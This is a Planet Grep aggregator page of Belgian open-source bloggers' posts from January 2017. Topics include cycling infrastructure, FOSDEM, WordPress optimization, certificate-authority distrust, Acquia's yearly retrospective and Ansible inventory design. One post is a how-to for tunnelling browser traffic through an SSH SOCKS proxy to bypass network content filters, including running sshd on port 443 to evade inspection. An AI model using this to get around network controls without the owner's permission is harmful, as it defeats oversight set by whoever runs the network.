Planet Grep

Planet'ing Belgian FLOSS people

Planet Grep is maintained by Wouter Verhelst. All times are in UTC.

January 21, 2017

This is post 2 of 2 in the series Les pistes cyclables

I thought I had discovered the truth: that cycle paths were in fact parking spaces. But I realised that wasn't true. Cycle paths are quite simply roads like any other.

All it takes, then, is painting a few arrows on the ground to proudly declare yourself a cycling-friendly municipality.

This system, of course, offers cyclists no protection whatsoever. Worse: under the highway code, they are required to stay within this sometimes poorly defined lane, and cars are required to drive over that very strip. This system is therefore worse for cyclists than no cycle path at all! The colour changes nothing…

At most, it brings to mind the blood spilled by cyclists who have been knocked down. That red surface also has the peculiarity of being so slippery in the rain that I avoid it at all costs. It would be far too dangerous!

A new idea then took hold in the minds of politicians eager to woo the cycling electorate without spending a cent: cycle streets!

A cycle street is a street in which a car may not overtake a bicycle. Remember that, normally, a driver may only overtake a cyclist while leaving at least one metre between himself and the bike. This initiative, however well-meaning, therefore does strictly nothing to encourage cycling.

Fortunately, cycle streets are rarely more than ten metres or so long. Let's not get carried away. These zones thus tend to confine cycling to a few rare spots and reinforce drivers' conviction that, everywhere else, they reign supreme.

The moral of the story: cycle paths don't exist, they are quite simply roads! Or sometimes, pavements…

The cyclist is thus required to ride on a narrow pavement, endangering pedestrians. Because, let's remember, using cycle paths (which don't exist) is mandatory!

But fortunately, cycle paths don't exist. They are roads…

…or pavements!

The photos in this article and the next illustrate a cyclist's daily struggle through the municipalities of Grez-Doiceau (MR mayor), Chaumont-Gistoux (MR mayor, Ecolo in the majority), Mont-Saint-Guibert (Ecolo mayor) and Ottignies-Louvain-la-Neuve (Ecolo mayor).

This text was published thanks to your regular support on Tipeee and on Paypal. I am @ploum, blogger, writer, speaker and futurologist. You can follow me on Facebook, Medium or get in touch with me.

This text is published under the CC-By BE licence.

January 20, 2017

With only two weeks left until FOSDEM 2017, we have added some new interviews with our main track speakers, varying from a keynote talk about Kubernetes through cryptographic functions based on Keccak and the application delivery controller Tempesta FW to ethics in network measurements:

  • Alexander Krizhanovsky: Tempesta FW. Linux Application Delivery Controller
  • Brandon Philips: Kubernetes on the road to GIFEE
  • Deb Nicholson and Molly de Blanc: All Ages: How to Build a Movement
  • Gilles Van Assche: Portfolio of optimized cryptographic functions based on Keccak
  • Jason A. Donenfeld: WireGuard: Next Generation Secure Kernel Network Tunnel. Cutting edge crypto, shrewd kernel design, …
This is post 1 of 2 in the series Les pistes cyclables

After riding my bike all over Walloon Brabant, I had a revelation: cycle paths don't exist, they are quite simply parking spaces.

It's as simple as that, and it explains everything.

Should I blame this driver for making me risk my life by forcing me to swerve abruptly onto the roadway without the slightest visibility?

Not if you consider that this strip is quite simply a parking space. This use is encouraged by the public authorities, who use the space to put up temporary road signs.

At least the space is being used for something, and this use hardly blocks any parking opportunities.

After all, if it works for temporary installations, why shouldn't it be the same for permanent ones?

The term "cycle path" is a nice joke, but let's be serious: who actually uses a bicycle to get around? While a road must be cleared immediately, our society regarding a traffic jam of a few hours as a catastrophe, the cycle pa… sorry, the parking lanes can stay blocked for days.

Of course a cyclist won't be able to get through and will quite literally have to risk his life on a fast road to continue on his way. But he should have taken the car like everyone else.

More seriously, I am now convinced that cycle paths are used for everything except cycling. The proof? Drivers are explicitly asked not to park on cycle paths during certain events.

These signs would block a bicycle from getting through, but we now know that cyclists don't really exist.

Unless cycle paths aren't parking spaces after all?

But what would they be in that case? I have my own little idea… (to be continued)

The photos in this article and the next illustrate a cyclist's daily struggle through the municipalities of Grez-Doiceau (MR mayor), Chaumont-Gistoux (MR mayor, Ecolo in the majority), Mont-Saint-Guibert (Ecolo mayor) and Ottignies-Louvain-la-Neuve (Ecolo mayor).

This text was published thanks to your regular support on Tipeee and on Paypal. I am @ploum, blogger, writer, speaker and futurologist. You can follow me on Facebook, Medium or get in touch with me.

This text is published under the CC-By BE licence.

January 19, 2017

The post Create a SOCKS proxy on a Linux server with SSH to bypass content filters appeared first on ma.ttias.be.

Are you on a network with limited access? Is someone filtering your internet traffic, limiting your abilities? Well, if you have SSH access to any server, you can probably set up your own SOCKS5 proxy and tunnel all your traffic over SSH.

From that point on, what you do on your laptop/computer is sent encrypted to the SOCKS5 proxy (your SSH server) and that server sends the traffic to the outside.

It's an SSH tunnel on steroids through which you can easily pass HTTP and HTTPs traffic.

And it isn't even that hard. This guide is for Linux/Mac OS X users that have direct access to a terminal, but the same logic applies to PuTTY on Windows too.

Set up SOCKS5 SSH tunnel

You set up a SOCKS 5 tunnel in 2 essential steps. The first one is to build an SSH tunnel to a remote server.

Once that's set up, you can configure your browser to connect to the local TCP port that the SSH client has exposed, which will then transport the data through the remote SSH server.

It boils down to a few key actions;

  1. You open an SSH connection to a remote server. As you open that connection, your SSH client will also open a local TCP port, available only to your computer. In this example, I'll use local TCP port :1337.
  2. You configure your browser (Chrome/Firefox/...) to use that local proxy instead of directly going out on the internet.
  3. The remote SSH server accepts your SSH connection and will act as the outgoing proxy/vpn for that SOCKS5 connection.

To start such a connection, run the following command in your terminal.

$ ssh -D 1337 -q -C -N user@ma.ttias.be

What that command does is;

  1. -D 1337: open a SOCKS proxy on local port :1337. If that port is taken, try a different port number. If you want to open multiple SOCKS proxies to multiple endpoints, choose a different port for each one.
  2. -C: compress data in the tunnel, save bandwidth
  3. -q: quiet mode, don't output anything locally
  4. -N: do not execute remote commands, useful for just forwarding ports
  5. user@ma.ttias.be: the remote SSH server you have access to

Once you run that, ssh will stay in the foreground until you CTRL+C it to cancel it. If you prefer to keep it running in the background, add -f to fork it to a background command:

$ ssh -D 1337 -q -C -N -f user@ma.ttias.be

Now you have an SSH tunnel between your computer and the remote host, in this example ma.ttias.be.
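To double-check that the local end of the tunnel is actually up, you can look for a listener on the port you chose. This is just a sanity check using the example port 1337 from above; pick whichever tool your system ships with:

$ ss -ltn | grep 1337
$ lsof -nP -iTCP:1337 -sTCP:LISTEN

If neither command shows a listener on :1337, the ssh command probably exited; run it again without -q to see what went wrong.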

Use SOCKS proxy in Chrome/Firefox

Next up: tell your browser to use that proxy. This is something that should be done per application as it isn't a system-wide proxy.

In Chrome, go to the chrome://settings/ screen and click through to Advanced Settings. Find the Proxy Settings.
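On the desktop, that screen usually hands you off to the operating system's proxy settings, which would affect every application. If you'd rather keep the proxy limited to Chrome, you can also start it with the proxy on the command line; a hedged example, since the binary name differs per platform (google-chrome, chromium, or the full application path on Mac OS X):

$ google-chrome --proxy-server="socks5://localhost:1337"

Only that Chrome instance will then send its traffic through the SOCKS proxy.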

In Firefox, go to Preferences > Advanced > Network and find the Connection settings. Set a manual SOCKS v5 proxy there, with localhost as the host and 1337 as the port.

From now on, your browser will connect to localhost:1337, which is picked up by the SSH tunnel to the remote server, which then connects to your HTTP or HTTPs sites.

Encrypted Traffic

This has some advantages and some caveats. For instance, most of your traffic is now encrypted.

What you send between the browser and the local SOCKS proxy is encrypted if you visit an HTTPs site; it's plain text if you visit an HTTP site.

What your SSH client sends between your computer and the remote server is always encrypted.

What your remote server does to connect to the requested website may be encrypted (if it's an HTTPS site) or may be plain text, in case of plain HTTP.

Some parts of your SOCKS proxy are encrypted, some others are not.

Bypassing firewall limitations

If you're somewhere with limited access, you might not be allowed to open an SSH connection to a remote server on the standard port 22. But all you need is to get an SSH connection going on some port, and you're good to go.

So as an alternative, run your SSH server on additional ports, like :80, :443 or :53: web and DNS traffic is usually allowed out of networks. Your best bet is :443: it normally carries encrypted traffic anyway, so there's less chance of deep packet inspection middleware blocking your connection because it doesn't follow the expected protocol.

The chances of :53 working are also rather slim, as most DNS is UDP based and TCP is only used for zone transfers or other rare DNS cases.
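As a rough sketch of what running sshd on :443 looks like on the remote server: add a second Port line (Port 443) next to the existing Port 22 line in /etc/ssh/sshd_config, assuming nothing else such as a web server already uses :443 and that you keep port 22 so you don't lock yourself out, then validate and restart sshd:

$ sudo sshd -t                  # test the configuration before restarting
$ sudo systemctl restart sshd   # or 'sudo service ssh restart' on older systems

From then on, build the tunnel over :443 instead of the default port:

$ ssh -p 443 -D 1337 -q -C -N user@ma.ttias.be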

Testing SOCKS5 proxy

Visit any "what is my IP" website and refresh the page before and after your SOCKS proxy configuration.

If all went well, your IP should change to that of your remote SSH server, as that's now the outgoing IP for your web browsing.
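If you prefer the terminal over a browser for that check, curl can do the same. This assumes curl is installed and uses ifconfig.co as an example "what is my IP" service; any similar service works:

$ curl https://ifconfig.co
$ curl --socks5-hostname localhost:1337 https://ifconfig.co

The first command shows your normal public IP, the second should show the IP of your SSH server. The --socks5-hostname option also resolves DNS through the proxy, so name lookups don't leak onto the local network.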

If your SSH tunnel is down, crashed or wasn't started yet, your browser will kindly tell you that the SOCKS proxy is not responding.

If that's the case, restart the ssh command, try a different port or check your local firewall settings.


January 18, 2017

Fewer blogposts here lately, mostly because I'm doing custom Autoptimize-development for a partner (more on that later) and because I get a lot of support-questions on the wordpress.org support forums (with approx. 1500-2000 downloads per weekday, that is to be expected). One of the more interesting questions I got there was about Autoptimize being slow when JS optimization was active and what the cause of that would be. The reply is of interest to a larger audience and is equally valid for CSS optimization;

Typically, the majority of the time spent in Autoptimize goes into the actual minification of code that is not minified yet. Whether code counts as already minified is decided purely on the filename: if the filename ends in .min.js or -min.js, it is not re-minified.

So generally speaking, the way to avoid this is;
1. have a page cache to avoid requests triggering autoptimize (as in that case the cached HTML will have links to cached CSS/JS in it)
2. for uncached pages; make sure AO can re-use previously cached CSS/ JS (from another page), in which case no minification needs to be done (for that you will almost always want to NOT aggregate inline JS, as this almost always busts the cache)
3. for uncached CSS/ JS; make sure any minified file is recognizable as such in the filename (e.g. .min.css -min.js), this can lighten the minification-load considerably (I’ll add a filter in the next version of AO so you can tell AO a file is minified even if it does not have that in the name).

So based on this, some tips;
* make sure you’re not aggregating inline JS
* for your own code (CSS/ JS); make sure it is minified and that the filename confirms this. if you can convince the theme’s developer to do so, all the better (esp. the already minified but big wp-content/themes/bridge/js/plugins.js is a waste of precious resources)
* you could try switching to the legacy minifiers (see FAQ) to see if this improves performance
* you can also check if excluding some un-minified files from minification helps performance (e.g. that bridge/js/plugins.js)

The post Starting with sponsorships for this blog appeared first on ma.ttias.be.

For the last few years I've always had some kind of advertising on this blog. At first, it was Google Adsense, which I've now replaced by Carbon ads.

Declining revenue

While AdSense had a higher payout (usually 4x to 5x higher than what Carbon can deliver), the ads were always ugly: online dating, flashy commercials, bright colours, ... nothing that actually fit the style of this blog.

Since I care about design and esthetics, I replaced those ads with Carbon -- an invite-only advertising network. They also care about the looks and can deliver better looking ads. If you're not using an adblocker, there's an example in the top right corner of this blogpost.

But there's still a fundamental problem with this approach: these kinds of ads use cookies and JavaScript to create an online profile and tailor ads to your persona.

They track you. They know you.

Getting rid of ads

When I rebuilt this blog 6 months ago, I famously said 'fuck ads'.

But as you can tell, there are ads on this blog. While I don't write for the money, having a constant revenue stream of semi-passive income (1) is pretty nice.

Since Google's ads were too obtrusive and ugly, and Carbon's ads not paying enough, I'm going to test a 3rd option: direct sponsored deals.

If you've got a brand, service or product you want to promote to around 100k visitors each month, you can now purchase advertising space on this blog. As soon as that happens, all ads will be removed and only the sponsorship message at the top will remain.

(1) With the amount of time that goes into writing detailed blogposts, I wouldn't exactly call it passive though.

No sponsored posts

I considered a fourth alternative, one that blogs like HighScalability use: sponsored posts. Someone pays you and writes a post, you publish it on your blog.

But that feels wrong as well. It's my blog. These are my words. Readers are assuming they're reading what I have to say. Not some random company spamming your RSS feed.

So I'm removing that option from the table too and going big on sponsorships with companies or organisations I can actually endorse. Companies that offer something a reader of this blog might actually enjoy.

It's a lot like advertising on the cron.weekly newsletter: whatever it is you're trying to sell, it needs to fit with the audience. Both for your sake (you'll get much better ROI) and for mine (I don't come off as a money-grabbing idiot that'll sell anything for a few $$).

I'm curious to see where this goes. I also haven't decided yet what I'll do when there isn't anyone willing to sponsor this blog. Let's assume, for the time being, that I won't have to think about that case. :-)

Want to sponsor?

Cool!

Have a look at the explanation, the statistics, what you can expect and what kind of content you can promote here: sponsorships.


January 17, 2017

The post Despite revoked CA’s, StartCom and WoSign continue to sell certificates appeared first on ma.ttias.be.

As it stands, the HTTPs "encrypted web" is built on trust. We use browsers that trust that Certificate Authorities secure their infrastructure and deliver TLS certificates (1) after validating and verifying the request correctly.

It's all about trust. Browsers trust those CA root certificates and in turn, they accept the certificates that the CA issues.

(1) Let's all agree to never call it SSL certificates ever again.

Revoking trust

Once in a while, Certificate Authorities misbehave. They might have bugs in their validation procedures that have led to TLS certificates being issued for domains the requester had no access to. It's happened for Github.com, Gmail, ... you can probably guess the likely targets.

When that happens, an investigation is performed -- in the open -- to ensure the CA has taken adequate measures to prevent it from happening again. But sometimes, those CA's don't cooperate. As is the case with StartCom (StartSSL) and WoSign, which in the next Chrome update will start to show as invalid certificates.

Google has determined that two CAs, WoSign and StartCom, have not maintained the high standards expected of CAs and will no longer be trusted by Google Chrome, in accordance with our Root Certificate Policy.

This view is similar to the recent announcements by the root certificate programs of both Apple and Mozilla.

Distrusting WoSign and StartCom Certificates

So Apple (Safari), Mozilla (Firefox) and Google (Chrome) are about to stop trusting the StartCom & WoSign TLS certificates.

From that point forward, those sites will greet visitors with a certificate error.

With Mozilla, Chrome & Safari, that's 80% of the browser market share blocking those Certificate Authorities.

Staged removal of CA trust

Chrome is handling the update sensibly: it'll start distrusting the most recent certificates first, and gradually block the entire CA.

Beginning with Chrome 56, certificates issued by WoSign and StartCom after October 21, 2016 00:00:00 UTC will not be trusted. [..]

In subsequent Chrome releases, these exceptions will be reduced and ultimately removed, culminating in the full distrust of these CAs.

Distrusting WoSign and StartCom Certificates

If you purchased a TLS certificate from either of those 2 CAs in the last 2 months, it won't work in Chrome, Firefox or Safari.
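If you're not sure who issued your certificate or when, a quick way to check a live site is to ask openssl; a sketch, with example.com standing in for your own domain:

$ echo | openssl s_client -connect example.com:443 -servername example.com 2>/dev/null | openssl x509 -noout -issuer -startdate

If the issuer mentions StartCom or WoSign and the notBefore date is after October 21, 2016, Chrome 56 will not trust that certificate.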

Customer Transparency

Those 3 browsers have essentially just bankrupted those 2 CA's. Surely, if your certificates are not going to be accepted by 80% of the browsers, you're out of business -- right?

Those companies don't see it that way, apparently, as they still sell new certificates online.

This is pure fraud: they're willingly selling certificates that are known to stop working in all major browsers.

Things like that piss me off, because only a handful of IT experts know that those Certificate Authorities are essentially worthless. But they're still willing to accept money from unsuspecting individuals wishing to secure their sites.

I guess they proved once again why they should be distrusted in the first place.

Guilt by Association

Part of the irony is that StartCom, which runs StartSSL, didn't actually do anything wrong. But a few years ago, they were bought by WoSign. In that process, StartCom replaced its own process and staff with those of WoSign, essentially copying the bad practices that WoSign had.

If StartCom hadn't been bought by WoSign, they'd still be in business.

I'm looking forward to the days when we have an easy-to-use, secure, decentralized alternative to Certificate Authorities.


January 16, 2017

The post Google Infrastructure Security Design Overview appeared first on ma.ttias.be.

This is quite a fascinating document highlighting everything (?) Google does to keep its infrastructure safe.

And to think we're still trying to get our users to generate random, unique, passphrases for every service.

Secure Boot Stack and Machine Identity

Google server machines use a variety of technologies to ensure that they are booting the correct software stack. We use cryptographic signatures over low-level components like the BIOS, bootloader, kernel, and base operating system image. These signatures can be validated during each boot or update. The components are all Google-controlled, built, and hardened. With each new generation of hardware we strive to continually improve security: for example, depending on the generation of server design, we root the trust of the boot chain in either a lockable firmware chip, a microcontroller running Google-written security code, or the above mentioned Google-designed security chip.

Each server machine in the data center has its own specific identity that can be tied to the hardware root of trust and the software with which the machine booted. This identity is used to authenticate API calls to and from low-level management services on the machine.

Source: Google Infrastructure Security Design Overview


As my loyal blog readers know, at the beginning of every year I publish a retrospective to look back and take stock of how far Acquia has come over the past 12 months. If you'd like to read my previous annual retrospectives, they can be found here: 2015, 2014, 2013, 2012, 2011, 2010, 2009. When read together, they provide a comprehensive overview of Acquia's trajectory from its inception in 2008 to where it is today, nine years later.

The process of pulling together this annual retrospective is very rewarding for me as it gives me a chance to reflect with some perspective; a rare opportunity among the hustle and bustle of the day-to-day. Trends and cycles only reveal themselves over time, and I continue to learn from this annual period of reflection.

Crossing the chasm

If I were to give Acquia a headline for 2016, it would be the year in which we crossed the proverbial "chasm" from startup to a true leader in our market. Acquia is now entering its ninth full year of operations (we began commercial operations in the fall of 2008). We've raised $186 million in venture capital, opened offices around the world, and now employ over 750 people. However, crossing the "chasm" is more than achieving a revenue target or other benchmarks of size.

The "chasm" describes the difficult transition conceived by Geoffrey Moore in his 1991 classic of technology strategy, Crossing the Chasm. This is the book that talks about making the transition from selling to the early adopters of a product (the technology enthusiasts and visionaries) to the early majority (the pragmatists). If the early majority accepts the technology solutions and products, they can make a company a de facto standard for its category.

I think future retrospectives will endorse my opinion that Acquia crossed the chasm in 2016. I believe that Acquia has crossed the "chasm" because the world has embraced open source and the cloud without any reservations. The FUD-era where proprietary software giants campaigned aggressively against open source and cloud computing by sowing fear, uncertainty and doubt is over. Ironically, those same critics are now scrambling to paint themselves as committed to open source and cloud architectures. Today, I believe that Acquia sets the standard for digital experiences built with open source and delivered in the cloud.

When Tom (my business partner and Acquia CEO) and I spoke together at Acquia's annual customer conference in November, we talked about the two founding pillars that have served Acquia well over its history: open source and cloud. In 2008, we made a commitment to build a company based on open source and the cloud, with its products and services offered through a subscription model rather than a perpetual license. At the time, our industry was skeptical of this forward-thinking combination. It was a bold move, but we have always believed that this combination offers significant advantages over proprietary software because of its faster rate of innovation, higher quality, freedom from vendor lock-in, greater security, and lower total cost of ownership.

Creating digital winners

Acquia has continued its evolution from a content management company to a company that offers a more complete digital experience platform. This transition inspired an internal project to update our vision and mission accordingly.

In 2016, we updated Acquia's vision to "make it possible for dreamers and doers to craft the digital world". To achieve this vision, we want to build "the universal platform for the world's greatest digital experiences".

We increasingly find ourselves at the center of our customers' technology and digital strategies, and they depend on us to provide the open platform to integrate, syndicate, govern and distribute all of their digital business.

The focus on any and every part of their digital business is important and sets us apart from our competitors. Nearly all of our competitors offer single-point solutions for marketers, customer service, online commerce or for portals. An open source model allows customers to integrate systems together through open APIs, which enables our technology to fit into any part of their existing environment. It gives them the freedom to pursue a best-of-breed strategy outside of the confines of a proprietary "marketing cloud".

Business momentum

We continued to grow rapidly in 2016, and it was another record year for revenue at Acquia. We focused on the growth of our recurring revenue, which includes new customers and the renewal and expansion of our work with existing customers. Ever since we started the company, our corporate emphasis on customer success has fueled both components. Successful customers mean renewals and references for new customers. Customer satisfaction remains extremely high at 96 percent, an achievement I'm confident we can maintain as we continue to grow.

In 2016, the top industry analysts published very positive reviews based on their dealings with our customers. I'm proud that Acquia made the biggest positive move of all vendors in this year's Gartner Magic Quadrant for Web Content Management. There are now three distinct leaders: Acquia, Adobe and Sitecore. Out of the leaders, Acquia is the only player that is open-source or has a cloud-first strategy.

Over the course of 2016 Acquia welcomed an impressive roster of new customers who included Nasdaq, Nestle, Vodafone, iHeartMedia, Advanced Auto Parts, Athenahealth, National Grid UK and more. Exiting 2016, Acquia can count 16 of the Fortune 100 among its customers.

Digital transformation is happening everywhere. Only a few years ago, the majority of our customers were in either government, media and entertainment or higher education. In the past two years, we've seen a lot of growth in other verticals and today, our customers span nearly every industry from pharmaceuticals to finance.

To support our growth, we opened a new sales office in Munich (Germany), and we expanded our global support facilities in Brisbane (Queensland, Australia), Portland (Oregon, USA) and Delhi (India). In total, we now have 14 offices around the world. Over the past year we have also seen our remote workforce expand; 33 percent of Acquia's employees are now remote. They can be found in 225 cities worldwide.

Acquia's offices around the world. The world got more flat for Acquia in 2016.

We've also seen an evolution in our partner ecosystem. In addition to working with traditional Drupal businesses, we started partnering with the world's most elite digital agencies and system integrators to deliver massive projects that span dozens of languages and countries. Our partners are taking Acquia and Drupal into some of the world's most impressive brands, new industries and into new parts of the world.

Growing pains and challenges

I enjoy writing these retrospectives because they allow me to chronicle Acquia's incredible journey. But I also write them for you, because you might be able to learn a thing or two from my experiences. To make these retrospectives useful for everyone, I try to document both milestones and difficulties. To grow an organization, you must learn how to overcome your challenges and growing pains.

Rapid growth does not come without cost. In 2016 we made several leadership changes that will help us continue to grow. We added new heads of revenue, European sales, security, IT, talent acquisition and engineering. I'm really proud of the team we built. We exited 2016 in the market for new heads of finance and marketing.

Part of the Acquia leadership team at The Lobster Pool restaurant in Rockport, MA.

We adjusted our business levers to adapt to changes in the financial markets, which in early 2016 shifted from valuing companies almost solely focused on growth to a combination of growth and free cash flow. This is easier said than done, and required a significant organizational mindshift. We changed our operating plan, took a closer look at expanding headcount, and postponed certain investments we had planned. All this was done in the name of "fiscal fitness" to make sure that we don't have to raise more money down the road. Our efforts to cut our burn rate are paying off, and we were able to beat our targets on margin (the difference between our revenue and operating expenses) while continuing to grow our top line.

We now manage 17,000+ AWS instances within Acquia Cloud. What we once were able to do efficiently for hundreds of clients is not necessarily the best way to do it for thousands. Going into 2016, we decided to improve the efficiency of our operations at this scale. While more work remains to be done, our efforts are already paying off. For example, we can now roll out new Acquia Cloud releases about 10 times faster than we could at the end of 2015.

Lastly, 2016 was the first full year of Drupal 8 availability (it was formally released in November 2015). As expected, it took time for developers and the Drupal community to become familiar with its vast array of changes and new capabilities. This wasn't a surprise; in my DrupalCon keynotes I shared that I expected Drupal 8 to really take off in Q4 of 2016. Through the MAP program we committed over $1M in funds and engineering hours to help module creators upgrade their modules to Drupal 8. All told, Acquia invested about $2.5 million in Drupal code contributions in 2016 alone (excluding our contributions in marketing, events, etc). This is the most we have ever invested in Drupal and something I'm personally very proud of.

Product milestones

The components and products that make up the Acquia Platform.

Acquia remains an amazing place for engineers who want to build great products. We achieved some big milestones over the course of the year.

One of the largest milestones was the significant enhancements to our multi-site platform: Acquia Cloud Site Factory. Site Factory allows a team to manage and operate thousands of sites around the world from a single console, ensuring all fixes, upgrades and improvements are delivered responsibly and efficiently. Last year we added support for multiple codebases in Site Factory – which we call Stacks – allowing an organization to manage multiple Site Factories from the same administrative console and distribute the operation around the world over multiple data centers. It's unique in its ability and is being deployed globally by many multinational, multi-brand consumer goods companies. We manage thousands of sites for our biggest customers. Site Factory has elevated Acquia into the realm of very large and ambitious digital experience delivery.

Another exciting product release was the third version of Acquia Lift, our personalization and contextualization tool. With the third version of Acquia Lift, we've taken everything we've learned about personalization over the past several years to build a tool that is more flexible and easier to use. The new Lift also provides content syndication services that allow both content and user profile data to be reused across sites. When taken together with Site Factory, Lift permits true content governance and reuse.

We also released Lightning, Acquia's Drupal 8 distribution aimed at developers who want to accelerate their projects based on the set of tested and vetted modules and configurations we use ourselves in our customer work. Acquia's commitment to improving the developer experience also led to the release of both Acquia BLT and Acquia Pipelines (private beta). Acquia BLT is a development tool for building new Drupal projects using a standard approach, while Pipelines is a continuous delivery and continuous deployment service that can be used to develop, test and deploy websites on Acquia Cloud.

Acquia has also set a precedent of contributing significantly to Drupal. We helped with the release management of Drupal 8.1 and Drupal 8.2, and with the community's adoption of a new innovation model that allows for faster innovation. We also invested a lot in Drupal 8's "API-first initiative", whose goal is to improve Drupal's web services capabilities. As part of those efforts, we introduced Waterwheel, a group of SDKs which make it easier to build JavaScript and native mobile applications on top of Drupal 8's REST-backend. We have also been driving usability improvements in Drupal 8 by prototyping a new UX paradigm called "Outside-in" and by contributing to the media and layout initiatives. I believe we should maintain our focus on release management, API-first and usability throughout 2017.

Our core product, Acquia Cloud, received a major reworking of its user interface. That new UI is a more modern, faster and responsive user interface that simplifies interaction for developers and administrators.

The new Acquia Cloud user interface released in 2016.

Our focus on security reached new levels in 2016. In January we secured certification that we complied with ISO 27001: the international security and compliance standard for enterprise cloud frameworks. In April we were awarded our FedRAMP ATO from the U.S. Department of Treasury after we were judged compliant with the U.S. federal standards for cloud security and risk management practices. Today we have the most secure, reliable and agile cloud platform available.

We ended the year with an exciting partnership with commerce platform Magento that will help us advance our vision of content and commerce. Existing commerce platforms have focused primarily on the transactions (cart systems, payment processing, warehouse/supply chain integration, tax compliance, customer credentials, etc.) and neglected the customer's actual shopping experience. We've demonstrated with numerous customers that a better brand experience can be delivered with Drupal and Acquia Lift alongside these existing commerce platforms.

The wind in our sales (pun intended)

Entering 2017, I believe that Acquia is positioned for long-term success. Here are a few reasons why:

  • The current market for content, commerce, and community-focused digital experiences is growing rapidly at just under 20 percent per year.
  • We hold a leadership position in our market, despite our relative market share being small. The analysts gave Acquia top marks for our strategic roadmap, vision and execution.
  • Digitization is top-of-mind for all organizations and impacts all elements of their business and value chain. Digital first businesses are seeking platforms that not only work for marketing, but also for service, compliance, portals, commerce and more.
  • Open source combined with the cloud continue to grow at a furious pace. The continuing rise of the developer's influence on technology selection also works in our favor.
  • Drupal 8 is the most significant advance in the evolution of Drupal, and Drupal's new innovation model allows the Drupal community to innovate faster than ever before.
  • Recent advances in machine learning, Internet of Things, augmented reality, speech technology, and conversational interfaces all coming to fruition will lead to new customer experiences and business models, reinforcing the need for API-first solutions and the levels of freedom that only open source and cloud computing offer.

As I explained at the beginning of this retrospective, trends and cycles reveal themselves over time. After reflecting on 2016, I believe that Acquia is in a unique position. As the world has embraced open source and cloud without reservation, our long-term commitment to this disruptive combination has put us at the right place at the right time. Our investments in expanding the breadth of our platform with products like Acquia Lift and Site Factory are also starting to pay off.

However, Acquia's success is not only determined by the technology we back. Our unique innovation model, which is impossible to cultivate with proprietary software, combined with our commitment to customer success has also contributed to our "crossing of the chasm."

Of course, none of these 2016 results and milestones would be possible without the hard work of the Acquia team, our customers, partners, the Drupal community, and our many friends. Thank you for your support in 2016 – I can't wait to see what the next year will bring!

This is my third post in the Ansible Inventory series. See the first and the second posts for some background information.

Preliminary note: in this post, I try to give an example of a typical deployment inventory, and what rules we might need the inventory to abide by. Whilst I tried to keep things as simple as possible, I still feel this gets too complex. I'm not sure if it's just a complex matter, if it's me overcomplicating things, or if Ansible just shouldn't try to handle things in such a convoluted way.

Let's have an example of how the inventory could be handled for a LAMP setup. Let's assume we have these 3 sets of applications:

  • an Apache + PHP setup
  • a MySQL cluster setup
  • an Apache reverse Proxy

We also have 3 environments: development, testing and production.

We have 4 different PHP applications, A, B, C and D. We have 2 MySQL cluster instances, CL1 (for dev and testing) and CL2 (for production). We have a single reverse proxy setup that manages all environments.

The Apache PHP application gets installed on one of three nodes, 1 per environment: node1 (dev), node2 (test) and node3 (prod).
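To make that layout concrete, here is a minimal sketch of how these hosts and groups might be laid out in a plain INI inventory today (the group and reverse proxy host names are made up for this example; expressing the variable handling on top of this structure is exactly the hard part this series is about):

[env_dev]
node1

[env_test]
node2

[env_prod]
node3

[apache_php:children]
env_dev
env_test
env_prod

# hypothetical host fronting all three environments
[reverse_proxy]
rpnode1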

For each role in ansible (assume 1 role per application here), we have to define a set of variables (a template) that gets applied to the nodes. If we focus on the apache-php apps for this example, the apache-php varset template gets instantiated 4 times, once for each of A, B, C and D. Assume the URL where the application gets published is part of each varset.

Each application gets installed on each node, respectively in one of the three environments. Each Apache-PHP node will need a list of those 4 applications, so it can define the needed virtual host and set each application in its subdirectory. Where each application was just a set of key-value pairs defining a single PHP app, we now need to listify those 4 varsets into a list that can be iterated over at the Apache config level.

Also, each Apache-RP node will need a list of applications, even when those applications are not directly installed on the reverse proxy nodes. The domain part (say contoso.com) is a specific domain for your organisation. Each application gets published beneath a specific context subfolder (contoso.com/appA, ..). For each environment we have a dedicated subdomain. We finally get 12 frontends: {dev,test,prod}.contoso.com/{appA,appB,appC,appD}. These 12 values must become a list of 12 values and be exported to the reverse proxy nodes, together with the endpoint of the respective backend. (1)

Similarly CL1 needs a list of the applications in dev and test, and CL2 needs a list of applications in prod. We need a way to say that a particular variable that applies to a group of nodes, needs to be exported to a group of other nodes.

So, the initial var sets we had at the app level get merged at some point when applied to a node. In this example, merging means: make a list out of the different single applications. It also means overrule: the environment gets overruled by membership of a certain environment group (like for the subdomain part).

Something similar could happen for the PHP version. One app could need PHP 5, whilst another would need PHP 7, which could bring in a constraint that gets those applications deployed on separate nodes within the same environment.

Of course, this can get very complicated, very quickly. The key is to define some basic rules the inventory needs (merge dictionaries, listify varsets, overrule vars, export vars to other hosts) and try to keep things simple.

 

Allow me to summarize a bunch of rules I came up with.

  • inventory is a group tree that consists of a set of subtrees, each of which instantiates some meaningful organisational function; typical subtrees are
    • organisation/customer
    • application
    • environment
    • location
  • variable sets define how they get merged
  • a subtree basically starts where a var set is defined to some child group 
  • all groups are equal, rules for groups are set by the variable sets assigned to them and how those should be inherited
  • those rules typically kick in when a group has multiple parents, when it’s a merge group
  • lookup plugins could be re-invented at this (merge) level to create new lists
  • an inventory tree typically has subtrees, and each subtree is the initial source for some variable sets (typically child group of an application subtree)
  • not clear yet: how to import and map an external inventory (dynamic script) into the local inventory scheme 
  • a variable is part of a variable set, and is defined by a schema; variables can merge by doing a hash merge, by listifying a var, or by adding lists, and they define a form of precedence (a weight, assigned to group subtrees, not by group depth any more)
    • it is namespaced by the variable set (could be linked to a specific application, perhaps maps onto an Ansible role)
    • it has a name
    • a type (single value, string, int, .. or a list or a dictionary…)
    • define a merge strategy (listify, merge list, add list, dictionary merge, deep merge, …)
    • when applied to a group (subtree), it defines a weight, check that no trees have the same weight!
    • it has a role: parameter (a plain inventory variable), runtime variable (feedback from playbook execution), or fact (the latter two could perhaps be the same)
    • track its source (applied to a group, some external inventory, …)
    • define a group_by rule, grouping/listifying it for several hosts (like the puppet external resources)
    • track which node is a master node
  • merge groups could also be “cluster groups” = the groups that hold and instantiate nodes that are part of a common application pool
  • whilst nodes can host different applications and hence be part of multiple cluster/merge groups, they can also be part of multiple other trees (think of separate nodes of a cluster that are part of different racks, or datacenters?)
  • merging variables can happen everywhere a node or group is member of different parents that hold the same variable set; hence at group level or at node level
  • nodes are children of merge groups and of other subtrees' groups
  • nodes can be members of multiple cluster/merge groups
  • which node in a cluster group is the master node is related to a var set
  • being the master can be initially a plain parameter, but is overruled by its runtime value (think of master fail over)
